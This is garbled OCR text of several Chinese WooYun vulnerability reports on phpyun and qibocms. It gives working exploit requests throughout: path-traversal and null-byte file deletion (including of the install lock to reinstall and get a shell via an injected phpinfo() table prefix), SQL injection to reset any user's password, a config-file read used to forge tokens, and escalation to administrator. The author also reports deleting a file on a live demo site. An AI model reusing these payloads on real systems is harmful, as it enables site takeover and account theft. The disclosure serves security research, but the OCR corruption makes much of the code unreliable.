phpyun 基 本 都 是 靠 过 滤 文件 。 如果 删 除 过 滤 文 件 肯定 是 有 注入 了 。 而 且 删 除 过 滤 
文件 不 会 像 删除 install 的 lock 一 样 对 网 站 造成 啥 损害 。 

详细 说 明 

http://**.**.**.**/bbs/thread-8149-1-1.html //20141222 


http://"*.**.**.**/PHP%E4%BA%91 %E4%BA%BA%E6%89%8D%HESB%8BB%IB%NESB 
%81%98%E7%B3%BB%E7%BB%IFV3.2_Beta.rar 


最 新 版 本 的 phpyun 下 载 地 址 
在 friend/model/index.class.php 中 


function save avatar. action() 
{ 

@header("Expires: 0"); 
@header("Cache-Control: private, post-check=0, pre-check=0, 
@header("Pragma: no-cache"); 
$type = isset($_GET['type'])?trim($_GET['type']):'small';/, 
$pic id = trim($ GET['photoId']); 
[[email protected]](/cdn-cgi/l/email-protection)(".",$pic : 
$uptypes-array('jpg', 'png', 'jpeg', 'bmp', 'gif'); 


if(count($nameArr)!-2) // 这 里 限制 了 只 能 含有 一 个 小 数 点 


exit(); 
j 
if(!is numeric($nameArr[0])) // 限 制 文件 的 名 字 必 须 为 数字 。 
{ 
exit(); 
} 
if(!in_array(strtolower($nameArr[1]),$uptypes)) // 限 制 文件 类 
{ 
$d['statusText'] = iconv("gbk", "utf-8", ' 文 件 类 型 不 符 !1' ); 
$msg = json_encode($d); 
echo $msg;die; 
} 


$new avatar path = 'upload/friend/friend '.$type.'/'.$pic : 

$len = file put contents(APP PATH.$new avatar path,file gel 
// 这 里 不 能 getshell 因为 phpyun 全 局 有 转 义 没 办 法 截断 。 所 以 也 只 能 写 图 片 。 

$avtar_img = imagecreatefromjpeg(APP PATH.$new avatar path: 

imagejpeg($avtar img,APP PATH.$new avatar. path, 80); 

$d['data']['uris'][0] z"../".$new avatar path; 

$d['status'] = 1; 

$d['statusText'] = iconv("gbk","utf-8", ' 上 传 成 功 !'); 

$row = $this-»0bj-»DB select once("friend info"," uid ="'".: 

if($type=="small") 

{ 

$this->obj->unlink_pic($row['pic']); 


$this->obj ->update_once("friend_info",array("pic"=>".., 


$state content = "我 刚 更 换 了 新 头像 。<br><img src=\"".$this 
$this->addstate($state_content); 
$this->obj->member_log(" 更 换 了 新 头像 ")， 
jelse( 
$this-»0bj-»unlink pic($row['pic big']);//7MF&B H» 
$this->obj ->update_once("friend_info", array("pic_big"=> 
j 
$msg = json encode($d); 


echo $msg; 





为 全 局 有 转 义 ,所 以 $new_avatar_path 没 办 法 截断 


$this->obj- 


>update_once("friend_info",array("pic_big"=>"../".6new_avatar_path),array("uid"= 
>$this->uid)) 但 是 这 里 有 一 个 入 库 。 


AKT 然后 再 把 $this->obj->unlink_pic($row['pic_big']);//#l Hz E] Fr 
出 库 出 来 的 删 掉 。 所 以 我 们 可 以 再 次 截断 了 。 所 以 这 个 截断 也 无 视 GPC 啥 的 。 
用 phpyun 的 demo ...J] iX 首先 注册 一 个 会 员 然后 请 求 


www....//friend/index.php? 
m=index&c=save anes 1 pes XXX/../../../robots.txt%00 


— — — ey ----- 一 一 一 - 一 ga 一 =--- e oe 一 - - — 


INT v| = $9 SQL XSS Encryptiony Encoding: Other 
æ Load URL w. hr135. com// friend/ index. php?mcindex&c-save avatar&photoId-l. jpghtype=xxx/../../..frobots. txtW00 = 
) Split URL + 


» Execute 








Enable Post data | | Enable Referrer 


[" data": l'url": [". . \/upload\/friend\/friend_xxx\/..\/..\/.. \/robots. txt \\O0\/1. 3pg"1), "status" :1, “statusText”:”\ude0a\u4d £20 
\u6210\u529F!")} 








这 样 先 转 义 入 库 了 。 然后 就 按照 这 样 再 请 求 一 次 。 


www....//friend/index.php? 
m=index&c=save_avatar&photold=1 .jpg&type=xxx/../../../robots.txt%00 


再 请 求 一 次 UE, 然后 就 又 能 截断 成 功 删 除了 robots.txt 
测试 的 时 候 把 demo 的 robots.txt 删 掉 了 http://www.**.**.**.**/robots.txt 已 经 404 了 。 


& PHP 常见 漏洞 


你 们 自己 添加 上 去 一 下 把 。 
一 步 的 利用 的 话 我 们 可 以 先 删 除 lock 然后 重 装 进 行 getshell 


/friend/index.php? 
m=index&c=save_avatar&photold=1 .jpg&type=xxx/../../../data/phpyun.lock%00 


这 个 需要 请 求 两 次 。 
@ LosdURL  —http://web.com/web/phpyun/install/index.php?step-sqi 


^» Execute 





[7] Enable Post data [E] Enable Referrer 


LER a a ad 


数据 库 表 前 缀 : phpyun_”’ ) ;phpinfo() ; /* 


创始 人 信息 





TEAS: adin 





EH. eeeee 


ia Load UAL het: /web.com/web/phppun/indas pha 





i) Execute 
E Grable Pos: data E Enazie Referer 





‘System  [Hindows NT 9LYTAZCUl351UDV 5.1 build 2500 


Build Date May 2 2008 18:01:20 


cscript /nologo configure. js "—-erable-srapsbot-build" "-—with-gd-saared" 
"—-with-extra-includes=C: \Propran Piles (x86) \Microsoft SDKXInclude;C: 


“—-with-ertra-libs7C: \Progran Biles 
(286) Microsoft SDK\Lib;C: uec MER Wade C: APROGRA&"2AMICROS^ 2 
W098 \MFCALIB” 


C= ADT A---L- on ^ Dowd. 


成 功 GETSHELL ° 





第 二 处 在 member/com/model/show.class.php 中 


WooYun-2014-88418 : phpyun (20141230) 任意 文件 删除 致 注入 可 改 任意 用 户 密 码 
(4 处 打包 ) 294 


function del_action(){ 
if($ GET['id']){ 
$row=$this->0bj->DB_ select once("company_show"," id ="" 


if(is_array($row) ) 


{ 
$this->obj->unlink_pic(".".$row['picurl']);//% €4e.: 
$oid-$this-»0bj-»DB delete all("company show","^id' -'".(int)$ GET[ 
j 
if ($oid) 
{ 
$this->obj->member_log("# ALAR"); 
$this->layer_msg(' 删 除 成 功 ! ',9); 
jelse( 
$this->layer_msg(' 删 除 失 败 1 ',8); 
j 





function upshow_action(){ 
if ($_POST['submitbtn']){ 
$time-time(); 
unset($ POST['submitbtn']); 


if(!empty($ FILES['uplocadpic']['tmp name'])) 


{ 
$upload=$this->upload_pic("../upload/show/", fa: 
$uplocadpic=$upload->picture($_FILES[ 'uplocadp: 
$this->picmsg($uplocadpic, $_SERVER[ 'HTTP_REFERI 
$uplocadpic = str replace("../upload/show","./i 
$row=$this->obj ->DB_select_once("company_show", 
if (is_array($row) ) 
{ 
$this->obj->unlink_pic(".".$row['picurl']), 
j 
selse{ 
$uplocadpic-$ POST['picurl'];//£ AX L_FILESH NRE 
j 
$nid-$this-»20bj-»DB update all("company show",""^picurl 
if($nid) 
Oy 





因为 这 里 是 update 所 以 要 先入 库 一 个 


4& model/user.php t 


function saveshow action() 


( 


if (!empty($ FILES)) 


( 


$pic-$name-''; 
$data-array(); 
$tempFile - $ FILES['Filedata']; 
$upload-$this-»upload pic("./upload/show/"); 
$pic=$upload->picture($tempFile); 
[[email protected] ](/cdn-cgi/l/email-protection)('.',$ 
$picurl=str_replace("../upload/show","./upload/show", $l 
$data['picurl']- $picurl; 
$data['title']-$this-»stringfilter($name[0]); 
$data['ctime']-time(); 
$data['uid']z(int)$ POST['uid']; 
$data['eid']-(int)$ GET['eid']; 
$id=$this->obj ->insert_into("resume_show", $data); 
if ($id) { 

echo $name[0]."||".$picurl."||".$id;die; 
selse{ 


echo "2";die; 








论 PHP 常见 漏洞 








€ Ai | web/web/phpyun32/index. php?m=user&c=saveshow 





B 访问 最 多 | | EasyTalk Administra: $ 90sec 信 息 安全 小 组 KJ Exploi t-on AA 





INT v| œ $ SQL  XSS- Encryption": Encoding: Other” 
4m] Load URL 
Split URL 





[C] Enable Post data [ | Enable Referrer 


1° ||. Aupload/show/20141220/14242072925. JPG | |1 


文件 名 不 可 控 AE update € ž 
这 里 因为 unlink_pic 限制 了 必须 为 jpg 后 组 之 类 的 这 里 我 们 截断 一 下 








LIL a me ww uic NOD GILI y p el vine Libgcuulltus Wester 
w Load URL http: //web/web/phpyun32/member/ index. php?c-show&act-upshow&i d=1 
U ^ Split URL 


^; Execute 





Enable Post data [ | Enable Referrer 














Post data submitbtn=xépicurl=. /robots. txt%00. jpg&id-l 
wana Oo 


4m] Load URL http: //web/web/phpyun32/member /index. php?c-show&act-del&id-1 
Ü Spit URL 
b) J 





Execute 





Enable Post data [ | Enable Referrer 
submitbtn-xépicurl-. /yu. txt*D0. jpg&id-1| 





Post data 








Ümsg" : "xu5220N09664Xu6210X0529f Nu £ £01", “tm :°2", "st" :9, "ur1" :^1"] 


3 


成 功 删 除根 目录 的 文件 。 


第 三 处 


member/user/model/show.class.php // 跟 上 面 一 个 相同 的 原理 不 过 是 因为 一 个 是 企 
TLE RAVEN 一 个 是 个 人 会 员 操 作 的 、 这 里 代码 我 都 不 贴 了 你 们 自己 查 把 。 


第 四 处 


WooYun-2014-88418 : phpyun (20141230) 任意 文件 删除 致 注入 可 改 任意 用 户 密 码 
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member/user/model/resume.class.php 


function del_action(){ 
$del-(int)$ GET['id']; 
$show-$this-»0bj-»2DB select all("resume show","'^eid' -'".$dt 


if(is array($show)) 


{ 
foreach($show as $v) 
{ 
Qunlink(".".$show['picurl']); 
j 
j 





A Æ 1€ /member/user/model/show.class.php 


function upshow. action()( 也 是 因为 用 户 可 控 了 。 


这 里 来 搞 一 下 注入 

首先 我 们 用 上 面 的 方法 删除 data/db.safety.php 这 个 参照 上 面 的 方法 就 不 多 说 了 。 
首先 删除 data/db.safety.php 后 就 不 会 转 义 了 那么 我 们 就 能 引入 单 引 号 了 。 
再 找 一 个 不 会 对 查询 转 义 的 函数 就 行 了 。 

在 model/forgetpw.class.php 中 


function editpw_action() 
{ 
if($ POST['username'] && $ POST['code'] && $ POST['pass']) 


{ 
$password = $ POST['pass']; 


$cert = $this->obj->DB_select_once("company_cert"," ty 


if(!$cert['uid']) 
{ 
$this->obj ->ACT_layer_msg(' 3164538 5 #ik | ' , 8, $this- 
selseif((time()-$cert['ctime'])>1200) { 
$this->obj->ACT_layer_msg(' 验 证 码 已 失效 ， 请 重新 获取 1 ', 
} 
$info = $this-»0bj-»DB select once("member"," Uyid ="'".: 
if(is_array($info)) 
{ 
$info['username'] = $cert['check2']; 


if(S$this-»-config[sy uc type]--"uc center" && $info| 


{ 

$this->obj->uc_open(); 

uc_user_edit($info[username], "", $password, $: 
jelse( 

$salt = substr(uniqid(rand()), -6); 

$pass2 = md5(md5($password).$salt); 

$value=" password -'$pass2', salt -'$salt'"; 

$this->obj->DB_update_all("member", $value, "~~ uic 
j 


$this-»0bj-»ACT layer msg(' 密码 修改 成 功 ! ', 9, $this-»U 





在 满足 这 些 条 件 后 甚至 可 以 改 任意 用 户 的 密码 


€ PHP 常见 漏洞 


i Init DB phpyunl226 

i Query SET NAMES GBK 

i Query SET character_ set -connection-gbk, character set -results-gbk, character set client-binary 
WHERE uid = 1' AND “usertype = 2 linit 1 
i Query SELECT “uid Y " check2', » Stine E phpyun company cert WHERE type -'5' AND check2 -'x' AND check -'x' union select 1, 2, 300000000í 
* iced : 1 














UPDATE ee wenber SET password -'590e618843382752cdcd58b5a83fTd95', salt -'b22554' WHERE uid = 1’ 





US Mozilla Firefox 
文件 到) 编辑 下 ) EQ) ALG) BEG) IAU HH 
[I http: //web/web/php-*£orgetpwbczedi tpw 











€ QVE] web/web/phpyun1226/index. php/ admin/?m=forgetpwhe=edi iw] L^ Google | jn I7 会 | e- 
i 





[B] 访问 最 多 人 EasyTalk Administra d 90sec 信 息 安全 小 组 KJ Exploit-nB 泼 洞 公布 了 EasyTalk Administra f] 133TDsy » 
= $ SQLr XSS- Encryption" Encoding: Üther- 

















http: //web/web/phpyunl226/index. php/admin/?m-forgetpw&ccedi tpw 





Enable Post data [| Enable Referrer 





Post data username-xécode-x' union select 1,2, 300000000000#hpass=xi aoyux 

















Logd UL Petr /web.com/yebphpryun inda pha 





Execute 
enable Post data E) Enasle Referer 





[System =| Hiindows NT 9LYTAZCOF3BIUDV 5.1 build 2500 


Build Date =| Kay 2 2008 18:01:20 


cscript /nologo configure. js “—-erable-snapshot-build” "--with-gd-shared" 
^—maith-extra-includes-C:XFrogran Files (x86) Microsoft SDKXInclude;C: 
XFROGRA"ZAMTCROS^ 2VCA8 NATL ATRCLUDE , Cz NPROGRA" 2AMTCROS  "2XVCO8^ TNCLITDR C: 
AFROCRA"ZAMICROS 2AVCOUSNMRCAINCLUDE" “--with-extra-libs7C: \Progran Piles 
(x85) Microsoft SOKXLib;C: \PROGRA”2\MICROS"2\.VC98\L IB; C: NPROGRA "2AMICROS Z 
NECIE \MFCALIB” 





A---L- A ^ Dowd... 


A I = 
修复 方案 


漏洞 的 源头 还 是 任意 文件 删除 怎么 能 让 用 户 直 接 控制 呢 。 


WooYun-2014-88418 : phpyun (20141230) 任意 文件 删除 致 注入 可 改 任意 用 户 密 码 
(4 处 打包 ) 301 


WooYun-2014-65835 : Qibocms 图 片 系统 任意 文 
件 查 看 导致 的 多 处 注入 (可 提升 自己 为 管理 员 ) 


" 
漏洞 作者 : ' 雨 。 V 
来 源 : http://www.wooyun.org/bugs/wooyun-2014-065835 


简要 描述 


最 大 化 。 还 有 个 跟 之 前 类 似 的 洞 这 里 就 不 多 说 了 。 


详细 说 明 
http://**.**.**.**/down2.php?v=photo1 .0#down 
下 载 地 址 
还 有 类 似 的 就 说 这 里 了 。 
在 photo/member/post.php 中 
require once(Mpath."inc/check.postarticle.php"); 
if($job=='postnew' ) 
{ 
if($step=='post' ) 
{ 
post_new(); 
// 生 成 静态 
make article html("$Murl/member/post.php?job-zendHTML&aid-$: 
$mid && $mid«106 && $none-'none'; 


refreshto("?job=postnew&fid=$fid", "<CENTER>[<A HREF='?jo0b=; 








在 这 里 又 是 包含 这 个 文件 进来 。 


inc/check.postarticle.php 


进去 看 看 。 

$postdb[smalltitle] = filtrate($postdb[smalltitle]); 
$postdb[picurl] - filtrate($postdb[picurl]); 
//$postdb[description]- filtrate($postdb[description]); 
$postdb [author] - filtrate($postdb[author]); 
$postdb[copyfrom] - filtrate($postdb[copyfrom]); 
$postdb[copyfromurl]- filtrate($postdb[copyfromurl]); 
$postdb[description] - preg replace('/javascript/i', 'jav: 
$postdb[description] - preg replace('/«iframe ([4<>]+)>/: 


// 针 对 火狐 浏览 器 做 的 处 理 
$postdb[ content ]=str_replace("=\\\"../$webdb[updir]/", "=\\\"$we 


if(!$groupdb[PostNoDelCode] ) { 


$postdb[ content ] = preg_replace('/javascript/i', 'javé 
$postdb[ content ] = preg replace('/«iframe ([4<>]+)>/: 
j 
// 采 集 外 部 图 片 
$postdb[content] = get outpic($postdb[content], $fid, $Get( 





在 这 里 又 调用 了 get_outpic 这 个 函数 可 以 跟 之 前 发 的 媒体 版 结合 解析 漏洞 Getshell 
那样 一 样 的 利用 。 


这 里 我 就 不 多 说 这 个 了 、 
继续 往 下 面 看 看 看 有 神 马 不 同 的 没 。 
这 里 和 媒体 版 的 那个 还 是 有 不 同 的 


if($post_db) { 
foreach($post_db[photourl][url] AS $key=>$value) { 

$value=trim($value); 

if(!$value||eregi("://", $value) ){ 
continue; 

j 

if(!$postdb[picurl]){ 
copy(ROOT_PATH."$webdb[updir ]/$value", ROOT_PATH. "$v 
$postdb[picurl]="{$value}. jpg"; 

j 


move attachment($1fjuid,tempdir($value),$downloadDIR); 
E 一 ee 





在 这 里 $post db 结合 qibocms 的 伪 全 局 直接 提交 一 下 就 行 了 。 


foreach($post_db[photourl][url] AS $key=>$value) { 
$value=trim($value); 
if(!$value||eregi("://", $value) ){ 


continue; 


在 这 里 循环 出 来 后 不 能 让 他 匹配 出 :// 然后 继续 看 
if(!$postdb[picurl]){ 当 这 个 为 false 的 时 候 进入 分 支 所 以 就 不 提交 这 个 了 。 


COpy(ROOT PATH."$webdb[updir]/$value",ROOT PATH."$webdb[updir]/1($v: 


$postdb[picurl]-"í[$value).jpg"; 
I 





eee 


这 里 如 果 我 们 控制 这 个 $value 为 配置 文件 然后 copy 成 .php.jpg 后 就 可 以 直接 查看 配 
置 文件 了 。 


但 是 这 只 是 一 个 任意 文件 读 取 。 怎么 来 把 他 最 大 利用 呢 。 

继续 看 在 member/yz.php 中 

elseif($action=='mobphone2') 

{ 

if($lfjdb[mob_ yz])f 

showerr("ta 12 x X tk FHF 881"); 

} 

if(!$yznum){ 

showerr(" 请 输入 验证 码 "); 

} 

elseif(!$md5code){ 

showerr(" 5t 4-78 ik"); 

}else{ 

unset($code,$mobphone,$uid); 

list($code,$mobphone, $uid)=explode("\t", mymd5($md5code,"DE") ); 
if($code!=$yznum||$uid!=$lfjuid){ 

showerr ("32 tE 44 A xq"); 

} 

} 

add_user($lfjuid,$webdb[YZ_MobMoney],' + Ju 5 45 # 1% XT’); 


$db->query("UPDATE {$pre}memberdata SET 
mobphone="$mobphone’,mob_yz="1' WHERE uid='$ifjuid"); 


把 $mobphone 直 接 带 入 到 了 查询 当中 而 且 在 Set 位 如 果 可 以 成 功 引入 单 引 号 的 话 
那 可 就 可 以 直接 提升 自己 为 管理 了 。 


但 是 qibocms 对 全 局 的 GET POST COOKIE 都 addslashes 了 。 
来 看 看 这 函数 


function mymd5($string, $action="EN", $rand=''){ // 字 符 串 加 窗 和 解密 
global $webdb; 
$secret string = $webdb[mymd5].$rand.'5*j,.^&;?.968Q!'; //Æ RF: 
if(!is_string($string) ){ 
$string=strval($string); 
j 
if($string==="") return ""; 
if($action=="EN") $md5code=substr(md5($string),8,10); 
else{ 
$md5code=substr($string, -10); 
$string-substr($string,O,strlen($string)-10); 
j 
//$key = md5($md5code.$ SERVER["HTTP USER AGENT"].$secret strir 
$key = md5($md5code.$secret string); 
$string = ($action--"EN"?$string:base64 decode($string)); 
$len = strlen($key); 
$code = ""; 
for($i=0; $i<strlen($string); $i++){ 
$k = $i%$len; 
$code .= $string[$i]^$key[S$k]; 
j 
$code = ($action == "DE" ? (substr(md5($code),8,10)==$md5code?s 
return $code; 


} 


«| = 








是 一 个 加 蜜 解密 的 函数 如 果 可 以 知道 key 的 话 ” 那 就 可 以 自己 生成 一 个 语句 然 
后 来 注入 了 。 





: PHP 常见 漏洞 


然后 利用 任意 文件 读 取 那 洞 可 以 看 到 key 的 。 
SO Come on. 


i i HE BA 


首先 利用 任意 文件 读 取 。 读 取 data/config.php 











Go- e web.com inni Aca A i u è Y [3 Z [x] P live Search [or 


THO SO SEM Ba “> Burp Suite Professional ¥1.5.18 - licensed to LarryLau 








oly RER | & Burp Intruder Repeater Window Help 
[roti contorta marae | Pow omen [ scanner | meruder [Repeater Comparer | extender [ options | Ale | 
X 查找 ; 5tz8zhwpsw L 


$webdb [’ List ShowIcon’ ]= 0” ———-, — 
$webdb [’ aut oGetKeyword’ M p Go Cancel «v >jr " 
Request Response 













































$webdb[’ autoGetSmallPic']-' w i 
$webdb [’ autoCutSnallPic']-' 1’ 
$webdb [' ForbidRepeatTitle’ ]=’ i 
$webdb [' viewNoPassArticle']-'ü 
$webdb[’ ArticlePicWidth’ ]=’ 800 
$webdb [' ArticlePicHeight’ ]=’ 60 
$webdb [' ArticleDownloadDirTime 
$webdb [' ArticleDownloadUseFtp’ 















Headers 
A4tflNUOAXILvBMDRGiFk; 4 | HTTP/1.1200 OK 


USR=pinfOpp8%0910%091403415968%09http%3A%2F%2Fweb.com%2Fq Date: Sun, 22 Jun 2014 07:33:47 GMT 
ibophoto%2Fdo%2Fswfuploadxml.php%3Ffiletype%3Djpg%2Cpng%2Cgif Server: Apache/ 2.2.9 (APMServ) mod. ssl/2.: 





Hex 



















$webdb['XunLei ID']-'08311'; |; PHP/5.2.6 
reci eels D 1; red passport =2%09xiaoyu%09AwQAUQIUBAtQV 1cCBgFUBINXBO4DU10FVg X-Powered -By: PHP/5.2.6 
wel sepTodayCount 15 1 ; l UBygcACVc%3D12363899e1; Set-Cookie: 





$webdb [’ ShopOtherSend’ ]=" 18’ ; 4 
$webdb [7 ForbidShowPhpPage' j="0 Admin=1%09VIAEV QOHBAtUV V YBAARV AwV WWIs BAwNQUFEJUQFUULY% 
$webdb [' bencandy_filename2’ ]-']| 3D94606de1fd; 

$webdb [' MailPw']-'8gz' ; adminID=CDkHAFReDW1XAAECC 19UDV RWV wV RUFCHAIFaCIADAIUNUV 
$webdb [’ Nai lId' ]= 1£ 38460163. cl|s5UCFEAVw%3D%3D638eb521ba 


Hes prepa t Wo Content-Type: application /x-www-form -urlencoded 
$webdb [’ QQ_QBappkey’ ]-' befedd7|| Content-Length: 642 
Swebdb[' list -filename2" ]z'list 






USR=pinfOpp8%096469%091403422427%0S 
2Fgibophoto%2F photo%2Fmember%2F post. [ 
step%3Dpost expires - Mon, 23-Jun-2014 0; 
Content-Length: 81 

Content-Type: text/html; charset=gb2312 



























图 片 格 式 不 允许 D: \Apm Serv \www \htdac: 
oad files/../data/config.php.jpa 








db Hi 
$vebab[ bokecc id']-''; mi i 
Saep [niibeian en 15° ZUIN Bautomakesmall%5D-= = 18picWhtt= 
$webdb l mynd” ]= SERIEN, 5D- 1&postdb%5Bcontent®5D =asd&Submit= 4XCCKEL XEDXBB» &post 
$webdb [' companyTrade’ ]= Bef] db%SBbak id$5D- &mid 2 &i id = &aid -O&rid =&only=&postdb%SBs mallti 
5 UE tle$$5D =&postdb%SBdescription%SD =&postdb%S5Bhtmlname%SD=&post 
db%SBtpl%SD%SBhead%5D = &postdb%SBtpI%SD%*SBfoot%SD = &postd b365 
Btpl%SD%SBbencandy%5D = &postdb%SBstyle%SD = &postdb%SBposttime 
%SD =&postdb%SBbegintime%SD =&postdb%SBendtime%SD =&postdb%S | 
Bhits%5D =&postdb%SBpas swd965D = &postdb%SBmoney%5SD =&postdb% E 


SBsubheadX5D - &post. db[photourl]furl][]-.. /data/config.php| T \* fes ) 
成 功 拿 到 key 然后 自己 写 个 脚本 来 生成 一 个 语句 














5 Load URL | http://web.com/fuck.php?a=aa'%o09yu'%o09xx 








L Split URL 
>») Execute 

Enable Post data Enable Referrer 
ost data mdScode=AwNEaFgEMUAb2fb25cabS2 














www.wooyun.org 


WooYun-2014-65835 : Qibocms 图 片 系统 任意 文件 查看 导致 的 多 处 注入 (可 提升 自 
己 为 管理 员 ) 307 


it PHP 常见 漏洞 





4m) Load URL http://web.com/albophoto/member/yz.php 
g Split URL ?action=mobphone2 


cecute 








Enable Past data Enable Referrer 
Post data md5code=WQUQOx1EED5MHg==boddc51166 


数据 库 连 接 出 错 :UPDATE qb memberdata SET mobphone-' yu’ | mob yz-' F WHERE uid? 2” 


You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to 
use near '1' WHERE uid? Z’ at line 1 
1064 

















|» 





www.wooyun.olg 
构造 一 下 语句 yu',groupid=3 where uid=2# 

groupid 为 3 的 话 即 为 管理 员 

不 知道 uid 的 话 可 以 直接 就 构造 yu' 报错 后 就 能 看 到 uid 

然后 调用 遂 数 生成 一 下 语句 。 


a=) Load URL http://web.com/fuck.php?a=aa'%o09yu',groupid=3 where uid=2%23%09xx 











O splt URL 
^; Execute 

Enable Post data Enable Referrer 
Post data mdScode=AwNEaFgEMUAb2fb25c6bS2 














WFNDaxOREBtTFgtBQloCDwZCFVoGSldEEApcXFYVaOBBT711claeSfÜ 


www.wooyun.org 





æ LoadURL http://web.com/gibophoto/member/yz.php 








r] Split URL ?action=mobphone2 
由 Execute 
Enable Post data Enable Referrer 
Post data mdScode- WFNDaxOREBETFatBQ10CDwZCFVoGS1dEEApcXF Y VaDBB7 11c1ae8fü 











网 页 正在 跳 转 当中 , AHR... 
RSM, 你 的 手机 号 码 成 功 通过 审核 , 你 同时 得 到 15 个 积分 奖励 ! 
如 果 您 的 浏览 器 没有 自动 跳 转 , 请 点 击 这 里 





www.wooyun.org 


WooYun-2014-65835 : Qibocms 图 片 系统 任意 文件 查看 导致 的 多 处 注入 (可 提升 自 
己 为 管理 员 ) 308 


O | 79153996 34299731 1 14634185 
1 | 1896-66-66 {| http://news.net/upld 
1366686465 | 888888 | i 
! 13399999999 


115 


9 | 6666-66-66 





mA update ° 
调用 这 函数 的 地 方 还 有 很 多 


在 inc/common.inc.php 中 


if($ COOKIE["adminID"]&&$detail-mymd5($ COOKIE["adminID"], 'DE', $on: 
unset($ uid,$ username,$ password); 
list($ uid,$ username,$ _password)=explode("\t",$detail); 
$1fjdb=$db->get_one("SELECT * FROM {$pre}memberdata WHERE uid- 
j 
if($lfjdb[yz]){ 
$1fjid-$1fjdb['username']; 
$1fjuid-$1fjdb['uid']; 
$l1fjdb[icon] && $1fjdb[icon]-tempdir($1fjdb[icon]); 
if($1fjdb['groupid']--3||$1fjdb['groupid']--4)( 
$web_admin=$sort_admin='1'; 
} 
if( file_exists(ROOT_PATH."data/group/{$lfjdb[groupid]}.php") ` 
[[email protected] ](/cdn-cgi/l1/email-protection)( ROOT_PATI 
可 H Z>] 
貌似 验证 通过 了 就 直接 登录 后 台 来 看 看 。 








$ COOKIE['adminID"]&&S$detailzmymd5($ COOKIE['adminID"|,'DE',$onlineip 
在 这 里 调用 了 这 函数 ”这 里 需要 注意 一 下 后 面 还 跟 了 第 三 个 参数 $onlineip 
看 看 第 三 个 参数 在 函数 中 起 的 作用 。 


function mymd5($string, $action="EN", $rand=''){ // 字符 串 加 审 和 解密 
global $webdb; 


$secret string = $webdb[mymd5].$rand.'5*j, .%&;?.%#@!'; 


加 入 到 了 这 个 $secret string € ® » 

然后 $onlineip 这 个 是 根据 xff 来 的 最 后 判断 了 一 下 是 否 是 正确 的 ip 
如 果 不 正确 ip 就 为 .. 这 里 我 们 构造 xf 为 一 个 错误 的 ip 就 行 
$onlineip3t 7... f ° 

然后 再 生成 一 下 语句 。 

EUEFEXEERUUABISELECI * FRUN qb memberdata WHERE uid= yu ^ AND username- aa 


You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syn 
use near "aa ”at line 
1064 ^) Live HTTP Replay 





POST vy http://web.com/gibophoto/admin/ 
HTTP Headers 

riii mL LDLLOSZS / S aD 3D. rende. LG GDDO*td- LU LESS, Lez / UGG, Id Ib zri rj E 
theme- default; Hm_lvt_19b6d084cOcf20alef26f87bd9c77 199= 1402707399; 

KCDa 2132. saltkey-kOESjWBE; KCDa 2132 lastvisit- 1402773035; 

KCOa 2132 ulastactivity- 7920 YzXNYS9/c2FQ9/s2FKBKDBdnOSWsF8J7BJDa4tflNUOAXILv8MDRGIFk; 
USR=x6nnwdsb%090%091403417385%09http%34 %o2F 

Laster Tt sr i rt 
BINXBO4DU10FVgUBVgcACV¥c%3D1236389 








- ys 3p plication) x-wWww-forrm-urlencodei 
Content: Length: 50 Y 














网 Send POST Content ? 





lnninnarmas acr&lnninmnwr= acdg,Ci hmmit v 2 3268.6 hmit v= 10 WWW.WO oy un.o rg 


应 该 可 以 直接 登录 后 台 懒得 弄 了 。 


4 人 > 
修复 方案 


源头 还 是 任意 文件 查看 。 


WooYun-2014-66459 : qibocmsV7 整 站 系统 任意 
文件 下 载 导 致 无 限制 注入 多 处 (可 提升 自己 为 管理 
Demo 演 示 ) 


Y 
漏洞 作者 : ' 雨 。 V 
来 源 : http://www.wooyun.org/bugs/wooyun-2014-066459 


简要 描述 

RE 写 完 标题 后 发 现 标题 如 此 的 长 。 

应 该 是 qibo 中 用 得 最 多 的 系统 了 把 。 

与 之 前 我 发 的 那个 有 所 不 同 。 Fuzz e 

发 现 qibo 是 不 是 换 人 了 ? 给 分 给 的 越 来 越 低 ? 之 前 18 到 10 到 现在 的 5 分 了 ? 
用 demo 来 演示 演示 把 。 

应 该 可 以 直接 登录 后 台 懒得 弄 了 。 


如 果 这 个 洞 还 不 给 20 的 话 我 只 能 呵呵 了 。 


详细 说 明 
http://**.**.**.**/down2.php?v=v7#down 
下 载 地 址 刚 下 载 的 。 

在 inc/job/download.php 中 


$url=trim(base64_decode($url)); 

$fileurl=str_replace($webdb[www_url],"",$url1); 

if( eregi(".php",$fileurl) && is_file(ROOT_PATH."$fileurl") ){ 
die("ERR"); 

j 

if(!$webdb[DownLoad_readfile] ){ 


$fileurl-strstr($url,"://")?$url:tempdir($fileurl); 


if( 


header("location:$fileurl"); 


exit; 


is file(ROOT PATH."$fileurl") )( 

$filename-basename($fileurl); 

$filetype-substr(strrchr($filename,'.'),1); 

$_filename=preg_replace("/([\d]+)_(200[\d]+)_([4_]+)\.([A\.]+), 

if(eregi("4([a-z0-9=]+)$",$_filename)&&! eregi("(jpg|gif |png)$", 
$filename-urldecode(base64 decode($ filename)).".$filetype' 

j 

ob end clean(); 

header('Last-Modified: '.gmdate('D, d M Y H:i:s',time()).' GMT 

header('Pragma: no-cache'); 

header('Content-Encoding: none'); 

header('Content-Disposition: attachment; filename='.$filename) , 

header('Content-type: '.$filetype); 

header('Content-Length: '.filesize(ROOT PATH."$fileurl")); 


readfile(ROOT PATH."$fileurl"); 


selse{ 


if(eregi(".php",$fileurl))( 
header("location:$fileurl"); 
exit; 
j 
$filename-basename($fileurl); 
$filetype-substr(strrchr($filename,'.'),1); 


$fileurl-strstr($url,"://")?$url:tempdir(S$fileurl); 


ob_end_clean(); 

header('Last-Modified: '.gmdate('D, d M Y H:i:s',time()).' GMT 

header('Pragma: no-cache'); 

header('Content-Encoding: none'); 

header('Content-Disposition: attachment; filename='.$filename) , 

header('Content-type: '.$filetype); 

readfile($fileurl); 
Eee 





$url-trim(base64 decode($url)) 
$fileurl-str replace($webdb[www url],"",$ur1l); 
if( eregi(".php",$fileurl) && is file(ROOT PATH."$fileurl") )( 


die("ERR"); 


这 里 由 于 是 解码 后 再 匹配 所 以 不 能 靠 编码 绕 过 。 
只 要 匹配 到 .php 就 退出 。 测试 了 一 下 .php. 也 会 被 匹配 出 。 
这 里 还 开启 了 i 模式 所 以 像 phP 之 类 的 大 小 写 绕 过 也 没 办 法 。 


难道 站 的 没 办 法 了 ? 


if( is file(ROOT PATH."$fileurl") ){ 
$filename-basename($fileurl); 
$filetype=substr(strrchr($filename,'.'),1); 
